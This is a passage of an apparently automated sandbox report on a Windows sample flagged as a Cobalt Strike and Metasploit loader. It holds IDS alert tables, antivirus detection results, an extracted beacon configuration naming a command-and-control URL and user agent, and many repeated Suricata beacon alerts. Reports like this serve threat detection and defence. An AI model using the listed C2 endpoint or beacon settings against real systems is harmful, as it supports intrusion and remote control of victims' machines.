            2024-10-01T09:20:43.308659+020020337131Targeted Malicious Activity was Detected192.168.2.4499248.130.42.22710001TCP
            2024-10-01T09:20:44.388802+020020337131Targeted Malicious Activity was Detected192.168.2.4499258.130.42.22710001TCP
            2024-10-01T09:20:45.452971+020020337131Targeted Malicious Activity was Detected192.168.2.4499268.130.42.22710001TCP
            2024-10-01T09:20:46.532833+020020337131Targeted Malicious Activity was Detected192.168.2.4499278.130.42.22710001TCP
            2024-10-01T09:20:47.631726+020020337131Targeted Malicious Activity was Detected192.168.2.4499288.130.42.22710001TCP
            2024-10-01T09:20:48.726981+020020337131Targeted Malicious Activity was Detected192.168.2.4499298.130.42.22710001TCP
            2024-10-01T09:20:49.782566+020020337131Targeted Malicious Activity was Detected192.168.2.4499308.130.42.22710001TCP
            2024-10-01T09:20:50.869027+020020337131Targeted Malicious Activity was Detected192.168.2.4499318.130.42.22710001TCP
            2024-10-01T09:20:52.939150+020020337131Targeted Malicious Activity was Detected192.168.2.4499328.130.42.22710001TCP
            2024-10-01T09:20:54.010943+020020337131Targeted Malicious Activity was Detected192.168.2.4499338.130.42.22710001TCP
            2024-10-01T09:20:55.078196+020020337131Targeted Malicious Activity was Detected192.168.2.4499348.130.42.22710001TCP
            2024-10-01T09:20:56.320815+020020337131Targeted Malicious Activity was Detected192.168.2.4499358.130.42.22710001TCP
            2024-10-01T09:20:57.479719+020020337131Targeted Malicious Activity was Detected192.168.2.4499368.130.42.22710001TCP
            2024-10-01T09:20:58.539468+020020337131Targeted Malicious Activity was Detected192.168.2.4499378.130.42.22710001TCP
            2024-10-01T09:20:59.608844+020020337131Targeted Malicious Activity was Detected192.168.2.4499388.130.42.22710001TCP
            2024-10-01T09:21:00.694909+020020337131Targeted Malicious Activity was Detected192.168.2.4499398.130.42.22710001TCP
            2024-10-01T09:21:01.773785+020020337131Targeted Malicious Activity was Detected192.168.2.4499408.130.42.22710001TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T09:16:59.037379+020020354421A Network Trojan was detected8.130.42.22710001192.168.2.449730TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 7kSftA4Eoh.exeAvira: detected
            Found malware configuration
            Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"C2Server": "http://8.130.42.227:10001/2yMe", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)\r\n"}
            Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)\r\n", "Type": "Metasploit Download", "URL": "http://8.130.42.227/2yMe"}
            Multi AV Scanner detection for domain / URL
            Source: http://8.130.42.227:10001/2yMeVirustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for submitted file
            Source: 7kSftA4Eoh.exeReversingLabs: Detection: 89%
            Source: 7kSftA4Eoh.exeVirustotal: Detection: 79%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 7kSftA4Eoh.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_00991184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00991184
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009BE020 CryptGenRandom,0_2_009BE020

            Compliance

            barindex
            Detected unpacking (creates a PE file in dynamic memory)
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeUnpacked PE file: 0.2.7kSftA4Eoh.exe.990000.1.unpack
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A0ED4 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_009A0ED4
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A779C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_009A779C

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49732 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49740 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49736 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49751 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49772 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49765 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49779 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49757 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49763 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49759 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49769 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49758 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49744 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49755 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49798 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49793 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49762 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49801 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49756 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49780 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2035442 - Severity 1 - ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1 : 8.130.42.227:10001 -> 192.168.2.4:49730
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49752 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49804 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49737 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49800 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49807 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49749 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49818 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49760 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49733 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49742 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49827 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49770 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49739 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49782 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49823 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49767 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49836 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49844 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49832 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49735 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49820 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49786 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49797 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49819 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49773 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49775 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49794 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49816 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49774 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49843 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49795 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49839 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49747 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49785 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49817 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49833 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49838 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49848 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49734 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49828 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49851 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49845 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49841 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49863 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49799 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49771 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49859 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49873 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49865 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49867 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49847 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49834 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49876 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49879 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49821 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49871 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49883 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49878 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49805 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49882 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49855 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49768 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49875 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49868 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49789 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49764 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49790 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49885 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49856 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49784 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49857 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49894 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49881 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49860 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49783 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49777 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49904 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49753 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49884 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49803 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49903 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49922 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49787 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49895 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49917 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49835 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49840 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49887 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49810 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49909 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49788 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49900 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49870 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49866 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49933 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49796 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49921 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49888 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49891 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49905 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49877 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49902 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49874 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49814 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49912 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49940 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49862 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49766 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49822 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49809 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49890 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49852 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49914 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49808 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49936 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49928 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49919 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49907 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49913 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49886 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49935 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49923 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49892 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49792 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49824 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49858 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49829 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49802 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49927 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49869 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49897 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49931 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49837 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49924 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49826 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49898 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49930 -> 8.130.42.227:10001
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49899 -> 8.130.42.227:10001
